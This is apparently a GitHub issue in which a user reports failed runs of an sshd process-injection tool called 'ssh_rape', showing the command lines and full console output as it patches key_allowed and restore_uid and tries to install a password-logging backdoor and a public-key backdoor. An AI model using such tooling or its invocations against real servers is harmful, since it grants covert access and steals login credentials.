Thank you for your code, it's a great piece of work :+1:
I have been trying to run it on my debian station (OpenSSH_6.9p1 Debian-3, OpenSSL 1.0.2d 9 Jul 2015, binary here sshd.zip) :
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub -t 127.0.0.1:31337 $(pidof sshd|awk '{print $1}')
_______ __________ ___. _____ _____________ ______
_/ ____/_/ ____| | | _\ __ )_ _\__ \ __ \/ __ )_
/\___ \/\___ \| ' | | / \/ _ / / / __/___/_
/ / / / / | \ | , / / . | ___/ \/ /
\ _______\ _______/____|____\ |___:\___\_____/__| | \__________\
\/ \/ \___|
[+] you gave me pid 8157
[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55fb79f76000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall = 0x55fb79f9cd75
[+] rexec_flag = 0x55fbbef87fed
[+] allocating config memory @ 0x55fb7a039000
[+] found sshd ELF base @ 0x55fb79f76000
[+] installing passlogger backdoor for [0x0100007f:0x697a] (TCP)..
[!] ERROR: could not locate use_privsep :(
$
[...]
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub $(pidof sshd|awk '{print $1}')
_______ __________ ___. _____ _____________ ______
_/ ____/_/ ____| | | _\ __ )_ _\__ \ __ \/ __ )_
/\___ \/\___ \| ' | | / \/ _ / / / __/___/_
/ / / / / | \ | , / / . | ___/ \/ /
\ _______\ _______/____|____\ |___:\___\_____/__| | \__________\
\/ \/ \___|
[+] you gave me pid 7399
[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55ee7c843000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall = 0x55ee7c869d75
[+] rexec_flag = 0x55eec1854fed
[+] allocating config memory @ 0x55ee7c906000
[+] found sshd ELF base @ 0x55ee7c843000
[+] installing pubkey backdoor..
[+] lea = 0x55ee7c86812b
[+] key_allowed = 0x24d40 .. patched at offset 0x8 in import table!
[+] lea = 0x55ee7c8a07d5
[+] restore_uid = 0x5d7b0 .. patched at offset 0x10 in import table!
[+] DSA_new@got = 0x0
[+] BN_new@got = 0x0
[+] DSA_new@plt = 0x0
[+] BN_new@plt = 0x0
[+] yo we got a callpair for (DSA_new, BN_new) -> 0x0
[!] ERROR: key_new not found :(
Hello,
Thank you for your code, it's a great piece of work :+1: I have been trying to run it on my debian station (OpenSSH_6.9p1 Debian-3, OpenSSL 1.0.2d 9 Jul 2015, binary here sshd.zip) :
Thanks for any help :)